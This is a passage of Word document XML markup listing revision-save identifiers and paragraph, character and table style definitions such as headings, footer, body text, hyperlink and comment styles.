    <w:rsid w:val="008B08E2"/>
    <w:rsid w:val="008B0D15"/>
    <w:rsid w:val="008B2B59"/>
    <w:rsid w:val="008B745C"/>
    <w:rsid w:val="008C11D3"/>
    <w:rsid w:val="008C43BD"/>
    <w:rsid w:val="008D36BE"/>
    <w:rsid w:val="008D50E8"/>
    <w:rsid w:val="008D55B4"/>
    <w:rsid w:val="008E0257"/>
    <w:rsid w:val="008E3008"/>
    <w:rsid w:val="008E4E0B"/>
    <w:rsid w:val="008E6738"/>
    <w:rsid w:val="008F0D20"/>
    <w:rsid w:val="008F1D17"/>
    <w:rsid w:val="008F23BA"/>
    <w:rsid w:val="008F5DD3"/>
    <w:rsid w:val="009009DB"/>
    <w:rsid w:val="0090280D"/>
    <w:rsid w:val="0090340B"/>
    <w:rsid w:val="00913F55"/>
    <w:rsid w:val="00914B7E"/>
    <w:rsid w:val="00914D7F"/>
    <w:rsid w:val="009208B5"/>
    <w:rsid w:val="00921158"/>
    <w:rsid w:val="0092292A"/>
    <w:rsid w:val="00932727"/>
    <w:rsid w:val="009337D3"/>
    <w:rsid w:val="00940966"/>
    <w:rsid w:val="00943D12"/>
    <w:rsid w:val="009453F5"/>
    <w:rsid w:val="00946E22"/>
    <w:rsid w:val="00953C02"/>
    <w:rsid w:val="00962162"/>
    <w:rsid w:val="0096776C"/>
    <w:rsid w:val="00967A09"/>
    <w:rsid w:val="00970D03"/>
    <w:rsid w:val="00972211"/>
    <w:rsid w:val="009736D8"/>
    <w:rsid w:val="009775D5"/>
    <w:rsid w:val="00977C61"/>
    <w:rsid w:val="00981783"/>
    <w:rsid w:val="009817B4"/>
    <w:rsid w:val="00983E25"/>
    <w:rsid w:val="0098400D"/>
    <w:rsid w:val="00987C20"/>
    <w:rsid w:val="00994FC1"/>
    <w:rsid w:val="009964AA"/>
    <w:rsid w:val="009A101C"/>
    <w:rsid w:val="009A24F6"/>
    <w:rsid w:val="009A28DF"/>
    <w:rsid w:val="009A4813"/>
    <w:rsid w:val="009B00B6"/>
    <w:rsid w:val="009B1621"/>
    <w:rsid w:val="009B1B4E"/>
    <w:rsid w:val="009B7ABD"/>
    <w:rsid w:val="009D08DE"/>
    <w:rsid w:val="009D7F7A"/>
    <w:rsid w:val="009E1430"/>
    <w:rsid w:val="009E6AC4"/>
    <w:rsid w:val="009F0D6F"/>
    <w:rsid w:val="009F1C22"/>
    <w:rsid w:val="00A03A9A"/>
    <w:rsid w:val="00A04471"/>
    <w:rsid w:val="00A04B70"/>
    <w:rsid w:val="00A04EF4"/>
    <w:rsid w:val="00A11676"/>
    <w:rsid w:val="00A21517"/>
    <w:rsid w:val="00A23D06"/>
    <w:rsid w:val="00A24665"/>
    <w:rsid w:val="00A27E88"/>
    <w:rsid w:val="00A33B90"/>
    <w:rsid w:val="00A35E16"/>
    <w:rsid w:val="00A40010"/>
    <w:rsid w:val="00A44109"/>
    <w:rsid w:val="00A442CF"/>
    <w:rsid w:val="00A5394A"/>
    <w:rsid w:val="00A54A6E"/>
    <w:rsid w:val="00A54F01"/>
    <w:rsid w:val="00A561BB"/>
    <w:rsid w:val="00A56BA6"/>
    <w:rsid w:val="00A61A51"/>
    <w:rsid w:val="00A6258B"/>
    <w:rsid w:val="00A627E9"/>
    <w:rsid w:val="00A63B14"/>
    <w:rsid w:val="00A64623"/>
    <w:rsid w:val="00A70126"/>
    <w:rsid w:val="00A72313"/>
    <w:rsid w:val="00A7530B"/>
    <w:rsid w:val="00A7624B"/>
    <w:rsid w:val="00A77CE3"/>
    <w:rsid w:val="00A803CF"/>
    <w:rsid w:val="00A816D8"/>
    <w:rsid w:val="00A82FF7"/>
    <w:rsid w:val="00A83695"/>
    <w:rsid w:val="00A856F4"/>
    <w:rsid w:val="00A86EE4"/>
    <w:rsid w:val="00A87445"/>
    <w:rsid w:val="00A91C6B"/>
    <w:rsid w:val="00A9480D"/>
    <w:rsid w:val="00A96C90"/>
    <w:rsid w:val="00A97B84"/>
    <w:rsid w:val="00AA1956"/>
    <w:rsid w:val="00AA1CBE"/>
    <w:rsid w:val="00AA1E9E"/>
    <w:rsid w:val="00AA4501"/>
    <w:rsid w:val="00AA61ED"/>
    <w:rsid w:val="00AA7AE4"/>
    <w:rsid w:val="00AB0574"/>
    <w:rsid w:val="00AB19C9"/>
    <w:rsid w:val="00AB4A42"/>
    <w:rsid w:val="00AB52AF"/>
    <w:rsid w:val="00AC1DED"/>
    <w:rsid w:val="00AC33FB"/>
    <w:rsid w:val="00AC34D8"/>
    <w:rsid w:val="00AC3B04"/>
    <w:rsid w:val="00AC7B21"/>
    <w:rsid w:val="00AC7C1C"/>
    <w:rsid w:val="00AD0973"/>
    <w:rsid w:val="00AD1435"/>
    <w:rsid w:val="00AD26F5"/>
    <w:rsid w:val="00AD3B99"/>
    <w:rsid w:val="00AD5D28"/>
    <w:rsid w:val="00AE01DD"/>
    <w:rsid w:val="00AE0618"/>
    <w:rsid w:val="00AE26C0"/>
    <w:rsid w:val="00AE5A6F"/>
    <w:rsid w:val="00AE6A8E"/>
    <w:rsid w:val="00AE6EAF"/>
    <w:rsid w:val="00AF15DE"/>
    <w:rsid w:val="00AF4BE5"/>
    <w:rsid w:val="00AF6250"/>
    <w:rsid w:val="00B054D4"/>
    <w:rsid w:val="00B1176E"/>
    <w:rsid w:val="00B11AFE"/>
    <w:rsid w:val="00B1217A"/>
    <w:rsid w:val="00B160AC"/>
    <w:rsid w:val="00B178C0"/>
    <w:rsid w:val="00B2177C"/>
    <w:rsid w:val="00B21B89"/>
    <w:rsid w:val="00B31C49"/>
    <w:rsid w:val="00B32C2F"/>
    <w:rsid w:val="00B358C4"/>
    <w:rsid w:val="00B452AB"/>
    <w:rsid w:val="00B46A7C"/>
    <w:rsid w:val="00B51BD3"/>
    <w:rsid w:val="00B5217F"/>
    <w:rsid w:val="00B53769"/>
    <w:rsid w:val="00B5468B"/>
    <w:rsid w:val="00B56F01"/>
    <w:rsid w:val="00B60B6D"/>
    <w:rsid w:val="00B623BA"/>
    <w:rsid w:val="00B63409"/>
    <w:rsid w:val="00B661FA"/>
    <w:rsid w:val="00B7296E"/>
    <w:rsid w:val="00B76289"/>
    <w:rsid w:val="00B84997"/>
    <w:rsid w:val="00B85833"/>
    <w:rsid w:val="00B86346"/>
    <w:rsid w:val="00B86D58"/>
    <w:rsid w:val="00B9223C"/>
    <w:rsid w:val="00B9592B"/>
    <w:rsid w:val="00B95E4F"/>
    <w:rsid w:val="00B96A12"/>
    <w:rsid w:val="00BA000A"/>
    <w:rsid w:val="00BA096C"/>
    <w:rsid w:val="00BA18A2"/>
    <w:rsid w:val="00BA3079"/>
    <w:rsid w:val="00BA7733"/>
    <w:rsid w:val="00BA7866"/>
    <w:rsid w:val="00BB15D8"/>
    <w:rsid w:val="00BB304E"/>
    <w:rsid w:val="00BC1D20"/>
    <w:rsid w:val="00BC6328"/>
    <w:rsid w:val="00BD007A"/>
    <w:rsid w:val="00BD089B"/>
    <w:rsid w:val="00BD3F6B"/>
    <w:rsid w:val="00BD495C"/>
    <w:rsid w:val="00BD59DE"/>
    <w:rsid w:val="00BD6DA8"/>
    <w:rsid w:val="00BE5ECC"/>
    <w:rsid w:val="00BE7FD9"/>
    <w:rsid w:val="00BF64CB"/>
    <w:rsid w:val="00BF7372"/>
    <w:rsid w:val="00BF78C9"/>
    <w:rsid w:val="00C016B4"/>
    <w:rsid w:val="00C01B28"/>
    <w:rsid w:val="00C04338"/>
    <w:rsid w:val="00C07631"/>
    <w:rsid w:val="00C13257"/>
    <w:rsid w:val="00C1491B"/>
    <w:rsid w:val="00C20CAC"/>
    <w:rsid w:val="00C27288"/>
    <w:rsid w:val="00C32D27"/>
    <w:rsid w:val="00C51184"/>
    <w:rsid w:val="00C52504"/>
    <w:rsid w:val="00C54F39"/>
    <w:rsid w:val="00C55FAE"/>
    <w:rsid w:val="00C63F4C"/>
    <w:rsid w:val="00C66382"/>
    <w:rsid w:val="00C70643"/>
    <w:rsid w:val="00C70655"/>
    <w:rsid w:val="00C72038"/>
    <w:rsid w:val="00C74684"/>
    <w:rsid w:val="00C77B17"/>
    <w:rsid w:val="00C83D6C"/>
    <w:rsid w:val="00C86297"/>
    <w:rsid w:val="00C86B68"/>
    <w:rsid w:val="00C90E13"/>
    <w:rsid w:val="00C9221D"/>
    <w:rsid w:val="00C96529"/>
    <w:rsid w:val="00C9751A"/>
    <w:rsid w:val="00C9762F"/>
    <w:rsid w:val="00CA0181"/>
    <w:rsid w:val="00CA218C"/>
    <w:rsid w:val="00CA2F32"/>
    <w:rsid w:val="00CA354F"/>
    <w:rsid w:val="00CA577C"/>
    <w:rsid w:val="00CC05E6"/>
    <w:rsid w:val="00CC0E24"/>
    <w:rsid w:val="00CC1B63"/>
    <w:rsid w:val="00CC2C4A"/>
    <w:rsid w:val="00CD358E"/>
    <w:rsid w:val="00CD521B"/>
    <w:rsid w:val="00CD52AE"/>
    <w:rsid w:val="00CD5701"/>
    <w:rsid w:val="00CD6A25"/>
    <w:rsid w:val="00CE227E"/>
    <w:rsid w:val="00CE237C"/>
    <w:rsid w:val="00CE23F9"/>
    <w:rsid w:val="00CE4F4C"/>
    <w:rsid w:val="00CE60C0"/>
    <w:rsid w:val="00CF0DE5"/>
    <w:rsid w:val="00CF45F7"/>
    <w:rsid w:val="00CF5761"/>
    <w:rsid w:val="00CF6983"/>
    <w:rsid w:val="00CF7410"/>
    <w:rsid w:val="00CF7E16"/>
    <w:rsid w:val="00D00123"/>
    <w:rsid w:val="00D03ABB"/>
    <w:rsid w:val="00D04492"/>
    <w:rsid w:val="00D06DF3"/>
    <w:rsid w:val="00D07167"/>
    <w:rsid w:val="00D12094"/>
    <w:rsid w:val="00D14A5F"/>
    <w:rsid w:val="00D14F89"/>
    <w:rsid w:val="00D1688E"/>
    <w:rsid w:val="00D16FC9"/>
    <w:rsid w:val="00D1715D"/>
    <w:rsid w:val="00D21ABD"/>
    <w:rsid w:val="00D23AD3"/>
    <w:rsid w:val="00D246C9"/>
    <w:rsid w:val="00D26F2A"/>
    <w:rsid w:val="00D3195D"/>
    <w:rsid w:val="00D31BA6"/>
    <w:rsid w:val="00D32C0D"/>
    <w:rsid w:val="00D35521"/>
    <w:rsid w:val="00D36566"/>
    <w:rsid w:val="00D4024A"/>
    <w:rsid w:val="00D41A06"/>
    <w:rsid w:val="00D45A38"/>
    <w:rsid w:val="00D469DC"/>
    <w:rsid w:val="00D50328"/>
    <w:rsid w:val="00D51F51"/>
    <w:rsid w:val="00D57E47"/>
    <w:rsid w:val="00D619FE"/>
    <w:rsid w:val="00D66CF6"/>
    <w:rsid w:val="00D66FC7"/>
    <w:rsid w:val="00D71469"/>
    <w:rsid w:val="00D81017"/>
    <w:rsid w:val="00D92446"/>
    <w:rsid w:val="00D95468"/>
    <w:rsid w:val="00DA11DF"/>
    <w:rsid w:val="00DA3CFE"/>
    <w:rsid w:val="00DB04FF"/>
    <w:rsid w:val="00DB0FEC"/>
    <w:rsid w:val="00DB3557"/>
    <w:rsid w:val="00DB485E"/>
    <w:rsid w:val="00DB4D24"/>
    <w:rsid w:val="00DB64A3"/>
    <w:rsid w:val="00DB6F6B"/>
    <w:rsid w:val="00DC509B"/>
    <w:rsid w:val="00DC6FCD"/>
    <w:rsid w:val="00DC7110"/>
    <w:rsid w:val="00DC7B03"/>
    <w:rsid w:val="00DD0ECD"/>
    <w:rsid w:val="00DD119C"/>
    <w:rsid w:val="00DD11EC"/>
    <w:rsid w:val="00DD4AE1"/>
    <w:rsid w:val="00DD50FB"/>
    <w:rsid w:val="00DD7D4A"/>
    <w:rsid w:val="00DE091E"/>
    <w:rsid w:val="00DE0C98"/>
    <w:rsid w:val="00DE2447"/>
    <w:rsid w:val="00DE53A4"/>
    <w:rsid w:val="00DE62B8"/>
    <w:rsid w:val="00DF13EF"/>
    <w:rsid w:val="00DF7909"/>
    <w:rsid w:val="00E00D9B"/>
    <w:rsid w:val="00E0683D"/>
    <w:rsid w:val="00E11D70"/>
    <w:rsid w:val="00E15F96"/>
    <w:rsid w:val="00E16DC1"/>
    <w:rsid w:val="00E16DC8"/>
    <w:rsid w:val="00E20D61"/>
    <w:rsid w:val="00E22506"/>
    <w:rsid w:val="00E22E7C"/>
    <w:rsid w:val="00E24F42"/>
    <w:rsid w:val="00E26B59"/>
    <w:rsid w:val="00E34EAD"/>
    <w:rsid w:val="00E46A32"/>
    <w:rsid w:val="00E5074A"/>
    <w:rsid w:val="00E51248"/>
    <w:rsid w:val="00E5265D"/>
    <w:rsid w:val="00E5343A"/>
    <w:rsid w:val="00E53974"/>
    <w:rsid w:val="00E54CCA"/>
    <w:rsid w:val="00E57AAB"/>
    <w:rsid w:val="00E623F7"/>
    <w:rsid w:val="00E7379F"/>
    <w:rsid w:val="00E756E5"/>
    <w:rsid w:val="00E81308"/>
    <w:rsid w:val="00E8301E"/>
    <w:rsid w:val="00E85710"/>
    <w:rsid w:val="00E903EB"/>
    <w:rsid w:val="00E9239B"/>
    <w:rsid w:val="00E93459"/>
    <w:rsid w:val="00E93FC9"/>
    <w:rsid w:val="00E94136"/>
    <w:rsid w:val="00E95465"/>
    <w:rsid w:val="00EA1CEC"/>
    <w:rsid w:val="00EA5446"/>
    <w:rsid w:val="00EB0872"/>
    <w:rsid w:val="00EB3FE4"/>
    <w:rsid w:val="00EB532E"/>
    <w:rsid w:val="00EB7ADD"/>
    <w:rsid w:val="00ED37B7"/>
    <w:rsid w:val="00ED5F04"/>
    <w:rsid w:val="00ED735F"/>
    <w:rsid w:val="00EE654E"/>
    <w:rsid w:val="00EE7E1F"/>
    <w:rsid w:val="00EF2BF8"/>
    <w:rsid w:val="00EF4507"/>
    <w:rsid w:val="00EF6F9D"/>
    <w:rsid w:val="00EF755F"/>
    <w:rsid w:val="00F01A33"/>
    <w:rsid w:val="00F029EC"/>
    <w:rsid w:val="00F03F96"/>
    <w:rsid w:val="00F07A66"/>
    <w:rsid w:val="00F13C40"/>
    <w:rsid w:val="00F15629"/>
    <w:rsid w:val="00F1700E"/>
    <w:rsid w:val="00F17E42"/>
    <w:rsid w:val="00F17FD2"/>
    <w:rsid w:val="00F2237C"/>
    <w:rsid w:val="00F22432"/>
    <w:rsid w:val="00F30752"/>
    <w:rsid w:val="00F309AD"/>
    <w:rsid w:val="00F31514"/>
    <w:rsid w:val="00F33CBF"/>
    <w:rsid w:val="00F36F3D"/>
    <w:rsid w:val="00F41F7C"/>
    <w:rsid w:val="00F460DA"/>
    <w:rsid w:val="00F462B8"/>
    <w:rsid w:val="00F508D5"/>
    <w:rsid w:val="00F511E6"/>
    <w:rsid w:val="00F54571"/>
    <w:rsid w:val="00F54A33"/>
    <w:rsid w:val="00F578CB"/>
    <w:rsid w:val="00F6118D"/>
    <w:rsid w:val="00F6297F"/>
    <w:rsid w:val="00F6314E"/>
    <w:rsid w:val="00F64943"/>
    <w:rsid w:val="00F64CC0"/>
    <w:rsid w:val="00F65700"/>
    <w:rsid w:val="00F66E25"/>
    <w:rsid w:val="00F7488D"/>
    <w:rsid w:val="00F753A8"/>
    <w:rsid w:val="00F76697"/>
    <w:rsid w:val="00F83DB1"/>
    <w:rsid w:val="00F8444D"/>
    <w:rsid w:val="00F85AE2"/>
    <w:rsid w:val="00F91A43"/>
    <w:rsid w:val="00F93A38"/>
    <w:rsid w:val="00F97962"/>
    <w:rsid w:val="00FA0421"/>
    <w:rsid w:val="00FA0733"/>
    <w:rsid w:val="00FA27CE"/>
    <w:rsid w:val="00FA2C39"/>
    <w:rsid w:val="00FA2D76"/>
    <w:rsid w:val="00FB1554"/>
    <w:rsid w:val="00FB2EEB"/>
    <w:rsid w:val="00FC2E2D"/>
    <w:rsid w:val="00FC36EB"/>
    <w:rsid w:val="00FC377E"/>
    <w:rsid w:val="00FC4B4A"/>
    <w:rsid w:val="00FC77FC"/>
    <w:rsid w:val="00FD48D4"/>
    <w:rsid w:val="00FD6694"/>
    <w:rsid w:val="00FD6C23"/>
    <w:rsid w:val="00FD79FD"/>
    <w:rsid w:val="00FE0C09"/>
    <w:rsid w:val="00FE6BBC"/>
    <w:rsid w:val="00FE7046"/>
    <w:rsid w:val="00FF05BD"/>
    <w:rsid w:val="00FF17B3"/>
    <w:rsid w:val="00FF197B"/>
    <w:rsid w:val="00FF2852"/>
    <w:rsid w:val="00FF462A"/>
    <w:rsid w:val="00FF6736"/>
    <w:rsid w:val="00FF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C73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0"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974"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="005A3E04"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00791D2D"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:b/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00521DF1"/>
    <w:pPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00122EC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1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00122EC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rsid w:val="004E5E18"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:aliases w:val="f"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="004E5E18"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:aliases w:val="pn"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004E5E18"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="004E5E18"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1008"/>
      </w:tabs>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="StyleHeading1">
    <w:name w:val="Style Heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="004E5E18"/>
    <w:pPr>
      <w:keepNext/>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
      <w:spacing w:before="240" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial Bold" w:eastAsia="Times New Roman" w:hAnsi="Arial Bold"/>
      <w:b/>
      <w:color w:val="EAEAEA"/>
      <w:kern w:val="28"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="StyleHeading2">
    <w:name w:val="Style Heading 2"/>
    <w:basedOn w:val="Heading2"/>
    <w:rsid w:val="004E5E18"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1008"/>
      </w:tabs>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="StyleHeading3">
    <w:name w:val="Style Heading 3"/>
    <w:basedOn w:val="Heading3"/>
    <w:rsid w:val="004E5E18"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:bCs/>
      <w:i/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-style-span">
    <w:name w:val="apple-style-span"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FE7046"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FE7046"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00F7488D"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading2Text">
    <w:name w:val="Heading2 Text"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00D92446"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1080"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial"/>
      <w:color w:val="000080"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E93459"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00093207"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00E22506"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F460DA"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00374686"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A72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313"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A54A6E"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A54A6E"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A54A6E"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A54A6E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A54A6E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="008B0D15"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00122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122ECC"/>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1"/>
    <w:rsid w:val="00122ECC"/>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1"/>
    <w:rsid w:val="005A3E04"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
